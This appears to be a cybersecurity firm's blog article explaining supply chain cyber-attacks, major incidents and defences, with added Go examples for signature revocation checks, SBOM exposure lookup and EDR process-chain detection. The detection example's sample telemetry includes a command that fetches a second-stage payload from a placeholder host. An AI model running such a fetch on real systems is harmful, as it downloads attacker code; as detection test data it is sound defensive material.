Author: Johnty Mongan
Cybercriminals target supply chains to reach as many victims as possible in a single hit. As supply chains can be large and complex, it can be difficult to know if you have sufficient protection in place. An increasing number of organisations are suffering cyber-attacks via their supply chains or via their providers of IT services. This is largely because attackers are able to take advantage of customers’ trust in their suppliers and exploit digital vulnerabilities.
What is a supply chain cyber-attack?
A supply chain cyber-attack occurs when threat actors access a company’s network via suppliers or a third-party provider (the ‘digital supply chain’). Because the third party has been given the permissions to use areas of the company’s network, applications or sensitive data, an attacker can gain access to these areas too if they are able to penetrate the third party’s defences. The distribution of malware (malicious software) is a common result of a supply chain attack.
Why are cyber-attacks on supply chains becoming more common?
The role of managed service providers (MSPs) in providing IT services such as security monitoring and digital billing makes them attractive targets for cybercriminals. Cyber-attacks on supply chains are becoming more common because they enable threat actors to reach large numbers of victims all at once: an attack on one business may give access to hundreds—or even thousands—of its customers, so the impact propagates far more widely than an attack on a single organisation.
Types of supply chain cyber-attacks
Hackers may attack a software company’s system, target an application’s source code and insert their own malicious code into the software. Any company that goes on to use this software would be a potential target because the product has been compromised.
Attacks can also arrive through compromised physical devices, such as USB drives. Once the device installs an application that gives the attacker access to the network, they can get to work: targeting a network device, infiltrating supply chain systems and causing widespread damage.
Firmware attacks target a computer’s booting code. When this malware has been surreptitiously loaded into a computer, the malicious code is executed as soon as the computer boots up, jeopardising the entire system or network.
Malware preinstalled on devices
Hackers can put malware on phones, USB drives, cameras and other mobile devices. When the device is connected to a system or network, malicious code is introduced with the ability to take over devices and download apps in the background. Manufacturers of budget devices that rely on third-party software can be particularly susceptible to this type of attack.
Certificates are used to vouch for the legitimacy or safety of a company’s product. If a hacker steals a certificate, they can sign and distribute malicious code that appears to be that company’s genuine software, and anything that trusts the certificate alone will accept it.
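The point to take from this is that a signature made with a stolen signing key is cryptographically valid, so a verifier that only checks the signature cannot tell the attacker's package from a genuine one; it also needs to know which keys the publisher has revoked. The following Go program is an added illustration of that check and is not code from the original article or from any vendor it names. It models a publisher's certificate as a pinned Ed25519 public key plus a revocation list, which is a simplification of real X.509 chains, CRLs and transparency logs; the package names, key IDs and artifact contents are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Release is a software package as shipped to customers: the artifact bytes,
// the ID of the publisher key that signed it, and the signature itself.
type Release struct {
	Name      string
	Artifact  []byte
	KeyID     string
	Signature []byte
}

// TrustStore is what the installing organisation holds: the publisher keys it
// has pinned, and the IDs of keys the publisher has since reported stolen or
// revoked. (Hypothetical structure; real deployments use X.509 certificates,
// CRLs or OCSP and a transparency log rather than raw keys.)
type TrustStore struct {
	Pinned  map[string]ed25519.PublicKey
	Revoked map[string]bool
}

var (
	ErrUnknownKey   = errors.New("signing key is not a pinned publisher key")
	ErrRevokedKey   = errors.New("signing key has been revoked by the publisher")
	ErrBadSignature = errors.New("signature does not match the artifact")
)

// KeyID derives a short, stable identifier for a public key.
func KeyID(pub ed25519.PublicKey) string {
	sum := sha256.Sum256(pub)
	return hex.EncodeToString(sum[:8])
}

// Sign is the publisher side: it produces a release signed with the given key.
func Sign(name string, artifact []byte, pub ed25519.PublicKey, priv ed25519.PrivateKey) Release {
	return Release{Name: name, Artifact: artifact, KeyID: KeyID(pub), Signature: ed25519.Sign(priv, artifact)}
}

// Verify decides whether a release may be installed. The revocation check runs
// before the cryptographic check on purpose: a signature made with a stolen key
// is mathematically valid, so validity alone cannot distinguish it from a
// genuine release.
func (t TrustStore) Verify(r Release) error {
	pub, ok := t.Pinned[r.KeyID]
	if !ok {
		return ErrUnknownKey
	}
	if t.Revoked[r.KeyID] {
		return ErrRevokedKey
	}
	if !ed25519.Verify(pub, r.Artifact, r.Signature) {
		return ErrBadSignature
	}
	return nil
}

// Scenario runs four constructed cases and returns the verdict for each: a
// genuine release, a tampered artifact, malware signed with the publisher's
// stolen key before revocation, and the same malware after revocation.
func Scenario() map[string]error {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	store := TrustStore{
		Pinned:  map[string]ed25519.PublicKey{KeyID(pub): pub},
		Revoked: map[string]bool{},
	}
	results := map[string]error{}

	genuine := Sign("agent-1.0", []byte("constructed: legitimate update"), pub, priv)
	results["genuine"] = store.Verify(genuine)

	tampered := genuine // same signature, modified bytes (e.g. a mirror altered the download)
	tampered.Artifact = []byte("constructed: legitimate update with inserted code")
	results["tampered"] = store.Verify(tampered)

	// The attacker holds the publisher's private key and signs their own artifact.
	stolen := Sign("agent-1.1", []byte("constructed: malicious update"), pub, priv)
	results["stolen key, before revocation"] = store.Verify(stolen)

	store.Revoked[KeyID(pub)] = true // the publisher discovers the theft and revokes
	results["stolen key, after revocation"] = store.Verify(stolen)
	return results
}

func verdict(err error) string {
	if err == nil {
		return "install allowed"
	}
	return "rejected: " + err.Error()
}

func main() {
	for name, err := range Scenario() {
		fmt.Printf("%-30s -> %s\n", name, verdict(err))
	}
}
```

Running it shows the "stolen key, before revocation" case being accepted: that is the window the attack lives in, and it closes only when the revocation reaches every verifier, which is why update tooling should fetch revocation data rather than trust a signature in isolation.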
By attacking the core script of a website template of a creative or digital agency that builds websites for their clients, cybercriminals can target these end clients and compromise their websites.
Watering hole attacks
This type of attack works by identifying a website that is frequented by users within a targeted organisation or sector. That website is then compromised to enable the distribution of malware. Typically, the malware delivered will be a Remote Access Trojan (RAT), enabling the attacker to gain remote access to the target’s system.
Examples of major supply chain cyber-attacks
Kaseya ransomware attack, 2021
Network management software firm Kaseya was the target of a ransomware gang that was able to breach the company’s remote monitoring and management package, Virtual Administration Assistant (VSA), via an authentication bypass vulnerability. Within days, up to 1,500 downstream customers had been affected by the attack through downloads containing malware.
Log4j vulnerability, 2021
Apache Log4j is one of the many building blocks that are used in the creation of modern software and is used by millions of computers worldwide running online services. A vulnerability was discovered that could allow attackers to break into systems, steal passwords and logins, extract data and infect networks with malicious software.
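The practical problem a flaw in a widely used building block creates is finding every application that embeds it, often several dependencies deep. The Go program below is an added example of that lookup and is not code from the original article or from the Apache project: it walks a small software bill of materials (SBOM) and reports each top-level application that reaches an affected library version, with the shortest dependency path. The component names, versions and the advisory's version range are constructed placeholders, not the real Log4j version range, and the inventory keys one version per library name as a simplification.

```go
package main

import (
	"fmt"
	"sort"
	"strconv"
	"strings"
)

// Component is one SBOM entry; Dependencies lists direct dependencies by name.
type Component struct {
	Name         string
	Version      string
	Dependencies []string
}

// Advisory names a library and the affected version range [From, FixedIn).
type Advisory struct {
	Library string
	From    string
	FixedIn string
}

// parseVersion turns "2.14.0" into [2 14 0]; non-numeric parts count as 0.
func parseVersion(v string) []int {
	parts := strings.Split(v, ".")
	out := make([]int, len(parts))
	for i, p := range parts {
		out[i], _ = strconv.Atoi(p)
	}
	return out
}

// CompareVersion orders versions numerically per component, so 2.14.0 > 2.2.0;
// a plain string comparison would get this wrong.
func CompareVersion(a, b string) int {
	av, bv := parseVersion(a), parseVersion(b)
	for i := 0; i < len(av) || i < len(bv); i++ {
		var x, y int
		if i < len(av) {
			x = av[i]
		}
		if i < len(bv) {
			y = bv[i]
		}
		if x < y {
			return -1
		}
		if x > y {
			return 1
		}
	}
	return 0
}

// Affected reports whether a version falls inside the advisory's range.
func (a Advisory) Affected(version string) bool {
	return CompareVersion(version, a.From) >= 0 && CompareVersion(version, a.FixedIn) < 0
}

// ExposedApplications returns, for every top-level application (a component no
// other component depends on) that reaches an affected version of the library
// directly or transitively, the shortest dependency path to it.
func ExposedApplications(sbom []Component, adv Advisory) map[string]string {
	byName := map[string]Component{}
	isDependency := map[string]bool{}
	for _, c := range sbom {
		byName[c.Name] = c
		for _, d := range c.Dependencies {
			isDependency[d] = true
		}
	}
	exposed := map[string]string{}
	for _, c := range sbom {
		if isDependency[c.Name] {
			continue
		}
		if path := shortestPathToAffected(byName, c.Name, adv); path != "" {
			exposed[c.Name] = path
		}
	}
	return exposed
}

// shortestPathToAffected is a breadth-first search over the dependency graph.
func shortestPathToAffected(byName map[string]Component, root string, adv Advisory) string {
	type item struct{ name, path string }
	queue := []item{{root, root}}
	seen := map[string]bool{root: true}
	for len(queue) > 0 {
		cur := queue[0]
		queue = queue[1:]
		c, ok := byName[cur.name]
		if !ok {
			continue // dependency missing from the SBOM: an inventory gap worth flagging
		}
		if c.Name == adv.Library && adv.Affected(c.Version) {
			return cur.path + "@" + c.Version
		}
		for _, d := range c.Dependencies {
			if !seen[d] {
				seen[d] = true
				queue = append(queue, item{d, cur.path + " -> " + d})
			}
		}
	}
	return ""
}

// SampleSBOM and SampleAdvisory are constructed for this example.
func SampleSBOM() []Component {
	return []Component{
		{Name: "billing-portal", Version: "3.2.0", Dependencies: []string{"web-framework", "logging-lib"}},
		{Name: "web-framework", Version: "5.1.0", Dependencies: []string{"logging-lib"}},
		{Name: "reporting-service", Version: "1.0.0", Dependencies: []string{"web-framework"}},
		{Name: "kiosk-app", Version: "0.9.0", Dependencies: []string{"image-lib"}},
		{Name: "logging-lib", Version: "2.14.0"},
		{Name: "image-lib", Version: "2.0.0"},
	}
}

func SampleAdvisory() Advisory {
	return Advisory{Library: "logging-lib", From: "2.0.0", FixedIn: "2.15.0"}
}

func main() {
	exposed := ExposedApplications(SampleSBOM(), SampleAdvisory())
	names := make([]string, 0, len(exposed))
	for n := range exposed {
		names = append(names, n)
	}
	sort.Strings(names)
	for _, n := range names {
		fmt.Println("exposed:", exposed[n])
	}
}
```

On the sample inventory, reporting-service is exposed even though it never lists the logging library directly, which is the case that a search of only direct dependencies misses.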
SolarWinds hack, 2020
After attackers compromised SolarWinds, a major software company, it unknowingly began to ship Orion Platform software updates containing the attackers’ malicious code. This triggered a huge supply chain incident that compromised the data, networks and systems of up to 18,000 organisations, including U.S. government agencies.
In each of these cases, a single breach, compromise or vulnerability in distributed code led to thousands of victims—an easy win for cybercriminals.
How to strengthen your digital supply chain
Organisations should work with their suppliers to identify potential supply chain risks and ensure appropriate cybersecurity measures are in place. Every supplier should be brought within the scope of your organisation’s security verification.
Endpoint Detection and Response (EDR) can play a vital role in protecting your organisation from supply chain attacks: it continuously monitors endpoint activity so that you know when an attack has occurred, the path it took and the actions it performed. An integrated approach to cybersecurity—combining EDR with anti-virus software and Multi-Factor Authentication (MFA)—can further strengthen your defences.
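To make concrete what "attack path" means for a supply chain compromise, the Go program below is an added example, not code from the original article or from any EDR product: it reconstructs process ancestry from a handful of constructed endpoint process-creation events and flags chains in which a supplier's updater spawns a command interpreter, which a legitimate update has no reason to do. The updater name vendor-updater.exe, the event fields and the sample events are all assumptions made for the example; real EDR telemetry carries many more fields and the detection rule would be tuned to the products actually deployed.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// ProcessEvent is a simplified process-creation record of the kind an EDR agent
// streams from each endpoint (constructed field set for this example).
type ProcessEvent struct {
	PID         int
	ParentPID   int
	Image       string // full path of the executable
	CommandLine string
}

// updaterImages are the supplier's update/agent executables we expect to see
// (hypothetical name). suspiciousChildren are interpreters an updater has no
// reason to launch; an update that does so is behaving like compromised code.
var updaterImages = map[string]bool{"vendor-updater.exe": true}
var suspiciousChildren = map[string]bool{
	"cmd.exe": true, "powershell.exe": true, "bash": true, "sh": true,
}

func baseName(path string) string {
	return path[strings.LastIndexAny(path, `\/`)+1:]
}

// AttackPath reconstructs the ancestry of a process, root first, by following
// ParentPID links; a missing or cyclic parent ends the walk.
func AttackPath(byPID map[int]ProcessEvent, pid int) []string {
	var path []string
	seen := map[int]bool{}
	for cur, ok := byPID[pid]; ok && !seen[cur.PID]; cur, ok = byPID[cur.ParentPID] {
		seen[cur.PID] = true
		path = append([]string{baseName(cur.Image)}, path...)
	}
	return path
}

// FindSuspiciousChains returns, sorted, the root-to-process chain of every
// process whose ancestry contains an updater that spawned an interpreter. The
// interpreter's descendants are reported too: those are the actions the attack
// took after gaining its foothold.
func FindSuspiciousChains(events []ProcessEvent) []string {
	byPID := make(map[int]ProcessEvent, len(events))
	for _, e := range events {
		byPID[e.PID] = e
	}
	var chains []string
	for _, e := range events {
		path := AttackPath(byPID, e.PID)
		for i := 0; i+1 < len(path); i++ {
			if updaterImages[path[i]] && suspiciousChildren[path[i+1]] {
				chains = append(chains, strings.Join(path, " -> "))
				break
			}
		}
	}
	sort.Strings(chains)
	return chains
}

// SampleEvents is constructed telemetry: one user session in which the updater
// launches cmd.exe, which then fetches a further file, plus benign noise such as
// a shell the user opened themselves.
func SampleEvents() []ProcessEvent {
	return []ProcessEvent{
		{PID: 100, ParentPID: 1, Image: `C:\Windows\explorer.exe`, CommandLine: "explorer.exe"},
		{PID: 200, ParentPID: 100, Image: `C:\Program Files\Vendor\vendor-updater.exe`, CommandLine: "vendor-updater.exe --check"},
		{PID: 300, ParentPID: 200, Image: `C:\Windows\System32\cmd.exe`, CommandLine: "cmd.exe /c helper.bat"},
		{PID: 400, ParentPID: 300, Image: `C:\Windows\System32\curl.exe`, CommandLine: "curl.exe https://example.invalid/stage2"},
		{PID: 500, ParentPID: 100, Image: `C:\Windows\System32\cmd.exe`, CommandLine: "cmd.exe"},
		{PID: 600, ParentPID: 100, Image: `C:\Windows\notepad.exe`, CommandLine: "notepad.exe"},
	}
}

func main() {
	for _, c := range FindSuspiciousChains(SampleEvents()) {
		fmt.Println("ALERT:", c)
	}
}
```

The user-opened cmd.exe (PID 500) is not reported, because the rule keys on the parent being the updater rather than on the interpreter alone; that distinction is what keeps a rule like this from drowning analysts in alerts.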
For specialist advice regarding your potential supply chain vulnerabilities or any other aspect of your organisation’s cyber risk, please get in touch with the Cyber Risk Management team.